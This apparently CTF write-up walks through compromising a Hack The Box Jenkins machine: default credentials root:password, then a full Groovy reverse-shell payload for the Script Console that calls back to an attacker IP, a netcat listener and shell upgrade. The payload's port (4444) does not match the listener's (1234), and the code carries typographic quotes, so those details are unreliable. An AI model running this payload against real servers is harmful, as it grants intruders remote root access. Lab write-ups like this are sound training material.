We continue with another very easy HTB box.
$ nmap -p- 10.129.243.77 -sV --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 17:54 CEST
Nmap scan report for 10.129.243.77
Host is up (0.062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 secondsHere we have a Jetty Jetty 9.4.39.v20210325
Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations.
https://www.eclipse.org/jetty/
If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F
This is a Jenkins server.
Leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.
https://www.jenkins.io
Looking at http://10.129.243.77:8080/oops what version is running the target.
Trying some default Jenkins passwords and easy credentials we quickly find out that the correct credentials are: root:password.
And we get a new answer to the Jenkins Script Console’s question.
Looking around we discover a Jenkins management section and a Script Console functionality that may help us to run commands.
Resources like https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6 gives us an idea about how to get a reverse shell using Jenkins Groovy Script Console.
String host=”10.10.14.69";
int port=4444;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
$ sudo nc -lnvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.243.77.
Ncat: Connection from 10.129.243.77:54554.
whoami
rootWe got a reverse shell, now we can improve a bit our tty with the usual commands.
script /dev/null -c bash
CRTL+Z
stty raw -echo; fg
reset xterm
terminal type: xterm
export TERM=xterm
export SHELL=bash
stty rows 51 columns 198And get our flag:
root@pennyworth:~# cd /root
root@pennyworth:~# ls
flag.txt snaproot@pennyworth:~# cat flag.txt
9cdfXXXXXXXXXXXXXXXXXXXXXXXXXXXX